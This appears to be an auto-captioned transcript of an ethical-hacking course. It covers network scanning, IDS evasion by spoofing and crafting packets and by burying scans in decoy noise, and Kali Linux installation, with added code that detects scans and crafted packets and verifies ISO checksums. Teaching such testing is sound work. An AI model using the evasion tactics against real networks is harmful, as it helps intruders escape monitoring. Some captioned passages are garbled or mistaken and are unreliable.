Now, let's talk about scanning. Scanning refers to the use of computer networks to gather information regarding computer systems and networks. Scanning is mainly used for security assessment and system maintenance, and also for performing attacks by hackers. The purpose of network scanning is as follows: it allows you to identify available UDP and TCP network services running on a targeted host; it allows you to recognize filtering systems between the users and the targeted host; it allows you to determine the operating systems in use by assessing the IP responses; and it also allows you to evaluate the target host's TCP sequence numbers and their predictability, to determine whether sequence prediction attacks and TCP spoofing are feasible. Now,


network scanning consists of network port scanning as well as vulnerability scanning. Network port scanning refers to the method of sending data packets via the network to a computer system's specified service ports; this is to identify the available network services on that particular system. This procedure is effective for troubleshooting system issues or for tightening the system's security. Vulnerability scanning is a method used to discover known vulnerabilities of computing systems available on a network. It helps to detect a specific weak spot in application software or the operating system which could be used to crash the system or compromise it for undesired purposes.

Now network port scanning as well as vulnerability scanning is an information gathering technique, but when carried out by anonymous individuals they are viewed as a prelude to an attack. The network scanning process, like port scans and ping sweeps, returns details about which IP addresses map to active live hosts and the type of services they provide. Another network scanning method, known as inverse mapping, gathers details about IP addresses that do not map to live hosts, which helps an attacker to focus on feasible addresses. Network scanning is one of the three important methods used by an attacker to gather information. During the footprinting stage the attacker makes a profile of the target organization; this includes data such as the organization's domain name system and email servers, in addition to its IP address range. During the scanning stage the attacker discovers details about the specified IP addresses that could be accessed online, their system architecture, their operating systems, and the services running on every computer. Now during the enumeration stage the attacker collects data including routing tables, network user and group names, Simple Network Management Protocol data, and so on.
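The port scans and ping sweeps just described are what a defender sees from the other side. As an added example (not part of the course), the script below reads constructed connection-log lines in an assumed simplified format (epoch seconds, protocol, source, destination, destination port or '-') and flags a source that touches many distinct ports on one host, or pings many hosts, within a short window; the thresholds are assumptions to be tuned to the network.

```python
from collections import defaultdict

# Thresholds are assumptions chosen for the constructed sample below; tune
# them to what normal traffic looks like on your own network.
PORT_THRESHOLD = 10   # distinct ports on one host from one source
HOST_THRESHOLD = 8    # distinct hosts pinged by one source
WINDOW_SECONDS = 60   # sliding window for both counts


def parse_line(line):
    """Parse '<epoch> <proto> <src> <dst> <dport|->' into a tuple.

    Returns (ts, proto, src, dst, port) or None for blank or malformed lines,
    so one bad log line does not stop the whole analysis.
    """
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, proto, src, dst, port = parts
    try:
        ts = int(ts)
        port = None if port == "-" else int(port)
    except ValueError:
        return None
    return ts, proto.upper(), src, dst, port


def detect(lines, port_threshold=PORT_THRESHOLD,
           host_threshold=HOST_THRESHOLD, window=WINDOW_SECONDS):
    """Return findings as a list of (kind, src, count) tuples.

    'portscan'  : src reached >= port_threshold distinct ports on one host
                  within `window` seconds (the port scan described above).
    'pingsweep' : src sent ICMP to >= host_threshold distinct hosts within
                  `window` seconds (the ping sweep described above).
    Each source is reported once, at the moment it crosses the threshold,
    so the count is the threshold, not the final total.
    """
    events = [e for e in (parse_line(ln) for ln in lines) if e]
    events.sort(key=lambda e: e[0])
    port_hits = defaultdict(list)   # (src, dst) -> [(ts, port), ...]
    icmp_hits = defaultdict(list)   # src        -> [(ts, dst), ...]
    findings, flagged = [], set()
    for ts, proto, src, dst, port in events:
        if proto == "ICMP":
            hits = icmp_hits[src]
            hits.append((ts, dst))
            hits[:] = [h for h in hits if ts - h[0] <= window]  # drop old
            distinct = {h[1] for h in hits}
            if len(distinct) >= host_threshold and ("pingsweep", src) not in flagged:
                flagged.add(("pingsweep", src))
                findings.append(("pingsweep", src, len(distinct)))
        elif port is not None:
            hits = port_hits[(src, dst)]
            hits.append((ts, port))
            hits[:] = [h for h in hits if ts - h[0] <= window]
            distinct = {h[1] for h in hits}
            if len(distinct) >= port_threshold and ("portscan", src, dst) not in flagged:
                flagged.add(("portscan", src, dst))
                findings.append(("portscan", src, len(distinct)))
    return findings


# Constructed sample log (not real traffic); timestamps are epoch seconds.
SAMPLE_LOG = (
    # 10.0.0.5 touches 12 ports on one host in 12 seconds: a port scan
    [f"{1000 + i} TCP 10.0.0.5 10.0.0.20 {20 + i}" for i in range(12)]
    # 10.0.0.7 pings 9 different hosts in 9 seconds: a ping sweep
    + [f"{1100 + i} ICMP 10.0.0.7 10.0.0.{30 + i} -" for i in range(9)]
    # an ordinary web client: many connections, but only ports 80 and 443
    + [f"{1200 + i} TCP 10.0.0.9 10.0.0.20 {443 if i % 2 else 80}"
       for i in range(30)]
    # the same 12 ports probed 100 s apart: stays under the 60 s window,
    # which is the blind spot a purely window-based rule has
    + [f"{2000 + 100 * i} TCP 10.0.0.8 10.0.0.20 {20 + i}" for i in range(12)]
    + ["garbage line", ""]
)

if __name__ == "__main__":
    for kind, src, count in detect(SAMPLE_LOG):
        print(f"{kind}: {src} ({count} distinct targets)")
```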

So now let's talk about intrusion detection evasion. Before we get into IDS evasion, let's talk about what exactly an IDS is. An intrusion detection system, or IDS, is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While anomaly detection and reporting is the primary function, some intrusion detection systems are capable of taking action when malicious activity or anomalous traffic is detected, including blocking traffic sent from suspicious IP addresses. Although intrusion detection systems monitor networks for all malicious activity, they are also prone to false alarms, or false positives. Consequently, organizations need to fine-tune their IDS products when they first install them; that means properly configuring their intrusion detection system to recognize what normal traffic on the network looks like compared to potentially malicious activity. An intrusion prevention system also monitors network packets for potentially damaging network traffic, but where an intrusion detection system responds to potentially malicious traffic by logging the traffic and issuing warning notifications, an intrusion prevention system responds to such traffic by rejecting the potentially malicious packets. So there are different types of intrusion detection system: they come in different flavors and detect suspicious activities using different methods.

One kind of intrusion detection system is the network intrusion detection system, or NIDS. It is deployed at a strategic point or points within the network where it can monitor inbound and outbound traffic to and from all the devices on the network. Then there is the host intrusion detection system, or HIDS, which runs on all computers or devices in the network with direct access to both the internet and the enterprise's internal network. HIDS have an advantage over NIDS in that they may be able to detect anomalous network packets that originated from inside the organization, or malicious traffic that the NIDS has failed to detect. HIDS may also be able to identify malicious traffic that originates from the host itself, as when the host has been infected with malware and is attempting to spread to other systems. A signature-based intrusion detection system monitors all packets traversing the network and compares them against a database of signatures or attributes of known malicious threats, much like antivirus software.

So now let's talk about IDS evasion.

Now an IDS is an intrusion detection system, as we just spoke about, and it is intended to detect exactly the types of activities that we are engaged in. Sometimes you may be called in to work on a target where your activities are known, and should be known, by the operators or the operations people involved in monitoring and managing the network, the idea being that not only do they want to assess the technical controls that are in place, but they also want to assess the operational procedures and ensure that the systems and processes are working the way that they are supposed to be working. Now when you are engaged with a target that you are in full cooperation with, you don't need to do these types of evasion tactics; all these techniques may actually be avoided. But if you are asked to perform an assessment or a penetration test on a target where they are not supposed to see your activities, then you need to know some different techniques to evade detection by an IDS. So we're going to talk about a couple of different things that you can do.


So one thing that you can do is manipulate packets to look a particular way. Now for this there is a tool called packit. Packit is a really good way to actually manipulate traffic, by manipulating the contents of a packet; for example, you can specify the destination and the source. So it's a really useful tool to set up a packet to look a particular way. One thing it can do is allow you to spoof IP addresses, so I could set the source IP address here to something completely different from mine. Now, whether I'm using TCP or UDP, I'm not going to see the response back, and in the case of TCP I'm not even going to get the three-way handshake completed, because the responses are going to go back to the spoofed source IP. But what you can do, in addition to spoofing, is set up particular ways that a packet may look, like changing the type of service, or changing the fragmentation offset, or using different flag settings, that may allow you through an IDS without getting flagged, and it may also allow you through a firewall. Now it's a slim possibility, but it's a possibility.

Now, another thing you can do is use packit to generate a lot of really bogus data, and what you might do is hide in the noise generated by packit. So you could create some really bogus packets that are sure to set off IDS alarms, and then you can run some legitimate scans underneath and hopefully be able to get some responses.
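From the IDS side, the hand-built packets just described (odd flag combinations, fragmentation tricks, spoofed sources, a burst of decoys) are exactly what signature checks look for. As an added example that is not from the course or from the packet-crafting tool it mentions, the code below runs a few such checks over constructed packet records (plain dicts standing in for decoded headers) and reports when many sources trip alerts in the same second, which is the "hide in the noise" pattern; the border-sensor placement and the thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict

MIN_TCP_HEADER = 20  # bytes: a first fragment shorter than this cannot hold the TCP header

# Assumption: the sensor sits at the internet border, so an inbound packet
# whose source is a private or loopback address cannot be genuine.
NEVER_EXTERNAL_SOURCES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
]


def check_packet(pkt):
    """Return the signature names one decoded packet record matches.

    pkt is a dict with keys ts, proto, src, dst, flags (set of TCP flag
    names), direction, and optionally more_fragments, frag_offset,
    payload_len.  An empty list means the packet looks stack-generated.
    """
    hits = []
    flags = set(pkt.get("flags", ()))
    if pkt.get("proto") == "TCP":
        if not flags:
            hits.append("null-scan")      # a real stack never sends no flags
        if {"SYN", "FIN"} <= flags:
            hits.append("syn-fin")        # open and close in one segment
        if {"FIN", "PSH", "URG"} <= flags and "ACK" not in flags:
            hits.append("xmas-scan")      # lit-up flags with no ACK
    if (pkt.get("more_fragments") and pkt.get("frag_offset", 0) == 0
            and pkt.get("payload_len", 0) < MIN_TCP_HEADER):
        hits.append("tiny-fragment")      # header split across fragments
    src = ipaddress.ip_address(pkt["src"])
    if pkt.get("direction") == "inbound" and any(src in n for n in NEVER_EXTERNAL_SOURCES):
        hits.append("spoofed-internal-source")
    return hits


def triage(packets, flood_threshold=20):
    """Run check_packet over a capture.

    Returns (alerts, flooded): alerts is [(index, src, [signatures])];
    flooded is True when more than flood_threshold distinct sources raised
    alerts in the same second, the 'hide in the noise' shape.  A flood is a
    reason to look harder at the quiet traffic underneath, not to mute alerts.
    """
    alerts = []
    sources_per_second = defaultdict(set)
    for i, pkt in enumerate(packets):
        sigs = check_packet(pkt)
        if sigs:
            alerts.append((i, pkt["src"], sigs))
            sources_per_second[pkt["ts"]].add(pkt["src"])
    flooded = any(len(s) > flood_threshold for s in sources_per_second.values())
    return alerts, flooded


def sample_capture():
    """Constructed packets (documentation-range addresses, not real traffic):
    one normal SYN, one of each hand-built shape, then a burst of decoys."""
    normal = {"ts": 1, "proto": "TCP", "src": "203.0.113.5",
              "dst": "198.51.100.9", "flags": {"SYN"}, "direction": "inbound"}
    crafted = [
        {**normal, "ts": 2, "flags": {"SYN", "FIN"}},
        {**normal, "ts": 3, "flags": set()},
        {**normal, "ts": 4, "flags": {"FIN", "PSH", "URG"}},
        {**normal, "ts": 5, "more_fragments": True, "frag_offset": 0, "payload_len": 8},
        {**normal, "ts": 6, "src": "10.1.2.3"},   # private source from outside
    ]
    noise = [{**normal, "ts": 7, "src": f"192.0.2.{i}", "flags": set()}
             for i in range(1, 26)]                # 25 decoy sources, one second
    return [normal] + crafted + noise


if __name__ == "__main__":
    alerts, flooded = triage(sample_capture())
    print(f"{len(alerts)} alerts, flood={flooded}")
    for index, src, sigs in alerts[:6]:
        print(index, src, sigs)
```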

Kali Linux is the industry's leading Linux distribution for penetration testing and ethical hacking. It offers tons and tons of hacking and penetration testing tools and different kinds of software by default. It is widely recognized in all parts of the world, even among Windows users who may not even know what Linux is. Well, to be precise, Kali Linux was developed by Offensive Security as the rewrite of BackTrack. BackTrack, just like Kali Linux, was a live Linux distribution that focused on security; it was used for digital forensics and penetration testing purposes. But the question here is, why should you choose Kali Linux when you have other choices like Parrot Security OS, BackBox, BlackArch and many more out there? Let me list a few reasons as to why Kali Linux is the best choice. First and foremost, it offers more than 600 penetration testing tools from different kinds of security fields and forensics.

Secondly, Kali Linux is customizable. So if you're not comfortable with the current Kali Linux tools or features or graphical user interface, you can customize Kali Linux the way you want. It is built on a secure platform: the Kali Linux team is actually made up of a small group of individuals, and those are the only ones who can commit packages and interact with the repositories, all of which is done using multiple secure protocols. So Kali Linux is definitely a secure platform. Although penetration tools tend to be written in English, Kali includes multilingual support; this way more users can operate in their native language and locate the tools that they need for the job that they are doing on Kali Linux. And lastly, Kali Linux, just like BackTrack, is completely free of charge. On top of all these benefits, Kali Linux offers different installation options. One way of installing Kali Linux is by making a Kali bootable USB drive. This is the fastest way of installing Kali Linux and the most favorable as well; we will discuss why in a while. You can also install Kali Linux using the hard disk. Installing Kali Linux on your computer using the hard disk is a very easy process, but you should make sure that your computer has compatible hardware.

You can also install Kali Linux alongside your operating system; it could be Windows or Mac, but you should exercise caution during the setup process because it might mess up your default BIOS settings. Lastly, you can use different kinds of virtualization software, such as VMware or VirtualBox, to install Kali Linux on your preferred operating system. Well, apart from all this, you can also set up Kali Linux on Advanced RISC Machines, or ARM, like Raspberry Pi, Trim-Slice, Cubietruck and many more. So there you go, guys. Now you know what Kali Linux is and why it is a leading Linux distro for ethical hacking and penetration testing. In today's session we will explore different ways to install Kali Linux.

Let's get started then. Earlier I said that the fastest method for setting up Kali Linux is to run it live from a USB drive. But why? First of all, it's non-destructive: it makes no changes to the host system's hard drive or the operating system that it is installed on, so once you remove the USB your operating system will return to its original state. Secondly, it's portable: you can carry Kali Linux in your pocket and can run it whenever you want, in just a few minutes. It's customizable: you can create your own Kali Linux ISO image and put it onto a USB drive using a simple procedure which we will discuss later. And lastly, it's potentially persistent: you can configure your Kali Linux live USB drive to have persistent storage, so that the data you collect is saved and you can use it across different reboots.

Now let's see how to create a bootable USB drive on Windows, guys. Actually the process is very simple; it's just a three-step process. First of all, you need to plug your USB drive into an available USB port on your Windows PC. Next you need to note down the destination drive letter it uses once it mounts; for example, it could be the F drive. After that, you will have to download and launch a software called Win32 Disk Imager. In the software, you'll have to choose the Kali Linux ISO file that needs to be imaged and verify that the USB drive to be overwritten is the correct one. Lastly, once the imaging is complete, you need to safely eject the USB drive from the Windows machine. So, like I said, it's very simple, right? Well, I'm not going to show you a demo on this one, because, like I said, it's very easy and I'm sure you guys can pull it off. If you have any doubts, you can post them in the comment section and we'll get back to you. And as for the demo part, we will be doing four installations here.

First of all, we'll see how to install Kali Linux using VMware on the Windows operating system. Then we'll see how to install Kali Linux on Mac using VirtualBox. Moving on, we'll see how to install Kali Linux tools on different Linux distributions; I'll be showing how to install them on Ubuntu. Well, the procedure is the same for every other Linux distribution, so you can go ahead and use the same procedure for the Linux distribution that you're using. And lastly, we will see how to install Kali Linux on Windows 10 using the Windows Subsystem for Linux. So I hope it's clear what we'll be learning in this session. Let's get started with the first demo. In this demo, we'll see how to launch Kali Linux using VMware.

So guys, you can install Kali Linux using any virtualization software; it could be VMware or VirtualBox. In this demo I'll show you how to install it using VMware. So first of all, obviously, we'll have to install VMware, right? So just search for VMware, and it's the first link that you find. You can go ahead and download VMware Workstation Pro; you have it in the Downloads. Here you can download Workstation Player as well, or you can download VMware Workstation Pro. Now, once that is downloaded, you will have to download a Kali Linux ISO image, so for that you will have to go to the official Kali Linux website. Just search for Kali Linux, and it's the first link. You can see the Downloads option here; click on Download, and yeah, you can see different download options here. You have Kali Linux Light for 64-bit as well as 32-bit, then there is Kali Linux 64-bit and 32-bit, and you have ready-made images for VMware and VirtualBox. Well, suppose you want to skip the entire lengthy procedure of installing it and you want to just use the image; then you can go ahead and use this Kali Linux 64-bit image for VMware or VirtualBox, and the same goes for the 32-bit as well. But since we are focusing on installing right now, let's just go ahead and download the ISO file and install it from the beginning until the last step.
I have already downloaded it, so I have an ISO file downloaded on my computer. So all you have to do is just click on the torrent link and it will be downloaded. Let's open VMware then. So, as you can see, I have VMware Workstation Pro installed here, and I already have two Ubuntu virtual machines installed on my VMware Workstation. As you can see, on the home page there are three different options: it says Create a New Virtual Machine, Open a Virtual Machine, and Connect to a Remote Server. So if you want to create a Kali Linux or any other virtual machine from step one, you can use this Create a New Virtual Machine option. Well, if you have an image of a virtual machine already, and if you want to just use it and avoid the installation procedure, then you can go ahead and use this Open a Virtual Machine option. Now, just click on Create a New Virtual Machine and click on Next, as you can see here.
You have an option which says Installer disc image file (iso); you'll have to attach your ISO, so click on Browse. Let's see where I've stored my Kali Linux. As you can see, I already have it here, and there's one file here; let me click on that and open it. So don't bother about this message at all; it usually shows that. And then click on Next here. So it's asking which operating system will be installed on this virtual machine; I want it to be Linux, so make sure you select Linux 64-bit and click on Next. You have an option to name your virtual machine; let's say Kali Linux. And where do I want to store it? In my Documents, under Virtual Machines, Kali Linux, sure, and click on Next. It says it already exists; let me try this one, then. Let's make it Kali Linux 1, and Next. Yeah, so basically your Kali Linux will need about 20 GB. Let's assign some 40 GB; that's the maximum disk size that you can allot, while you can allot more than that as well, but at minimum it needs about 20 GB. And you have an option here to store the virtual disk as a single file or as multiple files. Let's just select Store virtual disk as a single file, to avoid complications, and click on Next. So, as you can see, you can review your virtual machine settings here. You have an option to make changes to the settings; you can make changes right now, or you can do it later as well.

Let's just go ahead and make changes now. Click on the Customize Hardware option here. Well, as for the memory for this virtual machine, it totally depends on what you're using the virtual machine for; if you're not using it for heavy work, then you can assign the least amount of memory. Let's say I want to assign about 2 GB. There we go. And as for the processors: number of processors, 1, and the number of cores per processor you can choose as many as you want; let's say 2. This will increase the performance of your virtual machine, so again, it totally depends on whatever you want to choose. And yeah, we have already attached the image. The network adapter you can set to NAT; for the USB controller and sound card you can retain the default settings. And as for the display, click on Accelerate 3D graphics, since Kali Linux has a graphical user interface, and it says 768 MB is the recommended amount of memory that you can use for graphics. So let's go ahead and select that and click on Close. Well, you can actually make all these settings after installing Kali Linux as well, no problem there. Once you've done that, click on Finish here. As you can see, my Kali Linux image is ready for installation.

You have two options to power up. As you can see, you have this option here; you can click on that to power on this virtual machine, or you can go ahead and click on this one. Let me click on this. So once you click on that, you should be greeted with this Kali boot screen. As you can see, there are a lot of options here. We did discuss the Live option earlier, right? So if you don't want any trace of Kali Linux on your operating system, you can go ahead and use the Live option here. You have Live USB Persistence mode and Live USB Encrypted Persistence as well. Suppose you want to store some data and save it for later boots; you can use the Live persistence option here. And most of the time people get confused between this Install and Graphical Install. Just don't go ahead and click on the Install option; do it only if you are well versed with the command line interface. So basically that Install option is for the command line interface, so you will be greeted with the Kali Linux command line interface. So if you're using Kali Linux for the first time, go ahead with Graphical Install: select Graphical Install and press Enter. So, as you can see, it will start mounting storage devices. The whole installation process might take about 10 minutes.

So it's prompting you to select a language, so select your preferred language, then your location. Let's say English, and press Enter. And it's asking you for the country location; just give United States and Enter. And I want the keyboard to be configured with American English. You can choose any native language; like I said earlier, it supports multiple languages, so go ahead and choose it, but it might complicate the way you use Kali Linux later, so you can always go ahead and stick with English only. Well, it doesn't matter. So, as you can see, it's configuring the network. It will detect the ISO file and load the installation components and then prompt you to enter the hostname for your system. Well, in this installation, let's just enter kali and press Enter; you can give any name you want. And next it's asking you for the domain name. Suppose you have set up several virtual machines, and if you want to give all of them a domain name, you can assign a domain name as well, but it's optional. Let's not give any domain name here and press Enter. The next thing it does is it will prompt you for the password that you'll have to enter every time you launch your Kali Linux, so just give some password of your choice and click on Continue. The best thing about Kali Linux is you can set up the date and time as well. You can do it later as well, but you can choose it here, so just click on Eastern, or whichever choice you like, and press Enter.

So the installer will now probe your disk and offer you four different choices. As you can see, it says Guided - use entire disk; Guided - use entire disk and set up LVM, which is Logical Volume Manager; the same thing, but encrypted; and Manual. So if you are an expert, if you have already used Kali Linux before, you can go ahead and select any of these three options from the bottom, that is, LVM, manual, or encrypted LVM. Otherwise, you can always go ahead and choose the Guided - use entire disk option here if you are a beginner, and press Enter. So this is the disk partition where all the data will be stored; click on Continue. It's asking if you want to store all files in one partition, or if you want to make partitions. So depending on your needs, you can go ahead and choose to keep all your files in a single partition, which is the default, or have separate partitions for one or more of the top-level directories. Let's just choose the first option and press Enter.

So once you've done that, you'll have one last chance to review your disk configuration. Once you're sure that you've given the correct details, press Enter here. It's asking if the changes that you make to Kali Linux should be written to the disk or not, so say Yes. So it starts partitioning and installing the virtual machine. It took a while, but as you can see, the installation is almost done. It's asking me to configure the package manager. Well, if you select No in this session, you will not be able to install packages from the Kali repositories later. So suppose you want to install other repositories or updates later on; you can always go and click on Yes. Otherwise, you can go for No as well, and click on Continue. Now it's going to configure the package manager; it will install the package manager and configure it, and then it will install the GRUB boot loader. And it's asking if you want to install the GRUB boot loader to the master boot record. Definitely yes, so select Yes and click on Continue. So it's asking to select the device manually; you can click to select the device. So yeah, guys, we're done here, so you can finally click on the Continue option to reboot your new Kali installation. So as you can see, the entire process took about 10 to 11 minutes.

So yeah, let's go ahead and click on Continue here; it's going to finish the installation. So guys, as you can see, the installation process from the step where we select the language till the last step is the same; it's just the medium on which you are installing that is different. For example, right now we used VMware; later on I'll show you how to use VirtualBox, but once your Kali Linux image is ready to boot, the rest of the installation process is similar to this. So it's finished installing; it's loading the image. So if you have done everything right during the installation process, and according to your needs, you'll land up on this page: username. So we've given it as kali, right, k-a-l-i, and the password, and as you can see it's showing an error. It says that didn't work, please try again. This is mostly because the first time you log in you should use root as your default username, but later on, once you have already logged in, you can change the username according to your need. So root, and for the password you can use the same password which you set during the installation process. So, as you can see, the login is successful, and here I go: my Kali Linux is up and running, so I can start using Kali Linux according to my needs.

So once you've done that, you can go ahead and install VMware Tools so that you can maximize it to full screen and all that stuff. You can also go ahead and change the date and time settings; as you can see here, you can go for the Settings option here and do the settings, and you can start using Kali Linux for hacking and penetration testing purposes. So it's as easy as that, guys. So please go ahead and try installing it. Well, if you find any errors during the installation process, let us know in the comment section; we'll get back to you as soon as possible. Now, let's move on to our second demo. Now we'll see how to launch Kali Linux on the Mac operating system using VirtualBox. In the previous demo we used VMware, and now we'll be using VirtualBox. Actually I'm not using any Mac operating system here, but I'll show you how to install it using VirtualBox.

The procedure is very similar. So all you have to do is, on your Mac operating system, go ahead and search for VirtualBox download. So this is the VirtualBox official page; you can go ahead and click on Downloads here. As you can see, you have different options here: it says Windows hosts for the Windows operating system, OS X hosts, Linux hosts, and Solaris hosts. So if you're using Windows, then go ahead and select Windows hosts, but as for Mac, you'll have to select this one. It's mostly a .exe file. Once you've done that, you can install VirtualBox; it's just click on Next, Next, Next, and it will walk you through and provide settings according to your need. I already have VirtualBox installed. So the next thing you do is similar to what you've done with VMware: go ahead and download the official Kali Linux image. Make sure you don't download any duplicate versions of the ISO file from other websites; make sure you download it from the original website.
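Downloading from the official site is the first half of the check; the second half is comparing the downloaded ISO against the published SHA-256 digest before you boot it, both here and for the VMware download earlier. As an added example (not from the course or the Kali project), the script below verifies a file against a checksum list in the `sha256sum` layout (one `<digest>  <filename>` per line, the format of the SHA256SUMS file on the Kali download site); the ISO and checksum list it uses are constructed stand-ins so it runs offline.

```python
import hashlib
import os
import tempfile

HEX = set("0123456789abcdefABCDEF")


def parse_sha256sums(text):
    """Map filename -> lowercase hex digest from sha256sum-style lines.

    Accepts both the '  ' (text) and ' *' (binary) separators, skips blank
    and comment lines, and ignores anything that is not a 64-hex-char digest.
    """
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")
        if len(digest) == 64 and set(digest) <= HEX and name:
            table[name] = digest.lower()
    return table


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash the file in 1 MiB chunks so a multi-GB ISO is not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(iso_path, sums_text):
    """Return (ok, reason).

    ok is True only when the file's digest equals the entry listed for its
    basename; a file that is not listed is rejected rather than trusted, and
    the file is not even opened in that case.
    """
    expected = parse_sha256sums(sums_text).get(os.path.basename(iso_path))
    if expected is None:
        return False, "file not listed in checksum file"
    actual = sha256_of_file(iso_path)
    if actual != expected:
        return False, f"sha256 mismatch: got {actual[:12]}..., expected {expected[:12]}..."
    return True, "sha256 matches"


def demo():
    """Constructed scenario: an intact download, a tampered copy with the same
    name, and a file the checksum list does not mention."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        good_dir, bad_dir = os.path.join(d, "good"), os.path.join(d, "bad")
        os.makedirs(good_dir)
        os.makedirs(bad_dir)
        good = os.path.join(good_dir, "kali-example.iso")
        bad = os.path.join(bad_dir, "kali-example.iso")
        with open(good, "wb") as f:
            f.write(b"constructed iso content\n" * 1000)
        with open(bad, "wb") as f:
            f.write(b"constructed iso content\n" * 999 + b"one altered line!!!\n")
        # the 'published' checksum list, built here from the intact file
        sums = f"# constructed SHA256SUMS\n{sha256_of_file(good)}  kali-example.iso\n"
        results["good"] = verify_download(good, sums)[0]
        results["bad"] = verify_download(bad, sums)[0]
        results["unlisted"] = verify_download(os.path.join(good_dir, "other.iso"), sums)[0]
    return results


if __name__ == "__main__":
    print(demo())
```

A matching digest only proves the file equals what the checksum list names; the list itself has to come from the official site (over HTTPS, or checked against its detached signature) for that to mean anything.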

If you want to do it from the beginning, go ahead and download the ISO file via torrent, or you can just go ahead and download just the image for VirtualBox here, for 64-bit, and you have the option for 32-bit as well. I've already done that, so let me open my VirtualBox. Yeah, the procedure for VMware and VirtualBox is almost the same, with just slight differences. Let me maximize the screen for you guys. As you can see, I already have a virtual machine launched up here; I haven't powered it up yet. Anyway, I'll show you how to install a new one. Just click on the New option here. This is your VirtualBox home page, guys. So click on New here and just give a name. We've already given Kali Linux earlier for the virtual machine, so let's give it some other name; let's say Kali Linux with a capital K and L. And choose the type of operating system, that's Linux, and here 64-bit. According to your operating system needs you can go ahead and choose 32-bit as well. Click on Next, and again, like I said earlier, depending on what you're doing on the Kali Linux operating system or virtual machine, you go ahead and assign the memory. Since I'm just showing you how to install, I'm not assigning much memory here, so let's just retain the default one, 1024 MB, that's 1 GB, and click on Next. And it's asking; you have three options here.

Do not add a virtual hard disk, create a virtual hard disk now, and use an existing virtual hard disk file, if you have an external virtual hard disk. Go ahead and select the second option, click on Create, and use the VirtualBox Disk Image. Like I said earlier, we downloaded the ISO image, right, and it's an ISO file with the extension .iso, so basically it's nothing but an image. So click on Next, and I want the storage on the physical hard disk to be assigned dynamically, and click on Next. So this is the name of the virtual machine which we just gave earlier. It's asking you to choose the path where you want to store your virtual machine; let's say Documents and Virtual Machines, click on Open and Save, so that's the path for setup. And as for the size, Kali Linux always needs you to assign at least 20 GB, so let's go ahead and give 20 GB; you can always assign more than that, and click on Create.

So this is the one we


just created right?

It's ready.

Just click on settings


before you power up.

You'll have to make


certain settings.

So if you want to change name

or type and version


you can always go ahead

and do that here.

We don't have anything


in advance is just the folder

where your virtual machine


with this Toad go for systems.

We won't be using
any floppy disk are so right.
So on ticket or uncheck it and

yeah, this is memory

if you want to go ahead


and change or assign more memory

because the performance

of your virtual machine


is not that great.

It you can go ahead and do


that for the process

of make sure you enable


this extended features.

So basically if you want


to increase the performance

of your virtual
machine the number

of processors you assign


should increase Well for now

since I'm to show you

how to install and just going


to assign one you have option

to increase to say to like that.

And as for the display,

you can enable 3D acceleration


display storage settings.

This is the most


important one right now.

We don't have any image attached


to your so click on this empty

and click on the CD image

that you see here


and choose watch.

And attach the image or die.

So Fire torrent file,

which you just downloaded


click on open and audio

no settings default
Network by default.
You can always set it for Nat

since we're using only one


watching machine ha but

if you want to use a cuddle in X


with any other motion machine

like Metasploit able to you can


go ahead and use this host-only

adapter option here


because when you use Nat

and when you have


two virtual machines,

both of them will be assigned


with same IP address,

which will definitely a problem.

L'm because both

of these virtual machines


need to interact right?

So, yeah.

Well, I'm just saying all


this video information

so you can go ahead


and click on host-only adapter

if you using 2 virtual machines

and you want them


to interact as for now,

I'm just retaining


it Nat and rest

you can you don't have to make


any changes and click on OK

once you've made all


the settings click

on this or you can go ahead


and click on start option.

Are you can light click


on it and start Again,

like I said,

the installation process from


Step One is very similar to that

whether using VMware.

So again, you'll be greeted


with Kali boot screen and you

have multiple options again.

I'm not repeating


the entire thing here.

So go ahead and click


on graphical install.

And if you're a pro


and using command line,

you can always go


for install option.

And if you want to just use it


for one time purpose,

you can always go


for live option here.

That's all guys.

I'm sure you can catch


it from here, right?

Because it's almost similar


to the ones we did using VMware

if you have Here are just go


back and take a look at it.

Yeah, well, like I said,

I showed you on how to use


virtualbox to install Kali Linux

on Windows operating system.

Well, let's aim


for the Mac as well.

You just have to download your


stuff there instead of Windows.

You have another option


with this operating system.

You can dual boot


your color Linux

with Windows or Mac.


It's not as easy as
these installation process

because it will involve


you setting the BIOS to changes

that you get to see

when you power up


your computer initially.

Make sure you refer to color


Linux official documentation

and make sure you've done


the installation properly

so that you won't mess


up your default settings.

So guys we are done


with two ways

of installing Kali Linux one


on Windows and one on Mac.

We saw how to install it using VMware as well as VirtualBox. In the third part we'll see how to install Kali tools on any Linux distribution. It could be Ubuntu, Fedora, Peppermint OS, or any other version or distribution of Linux. The procedure is actually similar in every Linux distribution. So if you follow it on one Linux distribution, you can go ahead and do it on the Linux distribution of your choice, or the one that you use. One thing you should remember is that Kali Linux is not for daily Linux purposes. Well, it's only for ethical hacking or web application penetration testing, for these purposes.

So guys, we'll be using a tool called Katoolin. Let me spell it for you guys. It's K-A-T-O-O-L-I-N. So let's just search for that. There we go. It's a script that helps you to install Kali Linux tools on the Linux distribution of your choice. So it's usually the GitHub script. So click on the first link that you find. So for those of you who like to use penetration testing tools provided by the Kali Linux development team, you can effectively do that on your preferred Linux distribution using this tool, which is Katoolin. So as you can see, once you've installed Katoolin properly on your operating system, you should be greeted with this page. I'll show you how to do that. So the purpose of asking you to see this page is to take a look at the prerequisites. So the first thing, you need to have Python of version 2.7 or above installed in your operating system, and you need a Linux distribution. It could be Ubuntu or it could be Fedora or Peppermint, any other Linux distribution. I have Ubuntu here. I'll be using VMware Workstation Pro. It's already open, but let me just go back. All you have to do is search for Ubuntu and click on the first link. So as you can see, there are a lot of options here. To install Ubuntu, just click on this and you'll be able to download the ISO image file. I've already done that. I'm not doing it again.

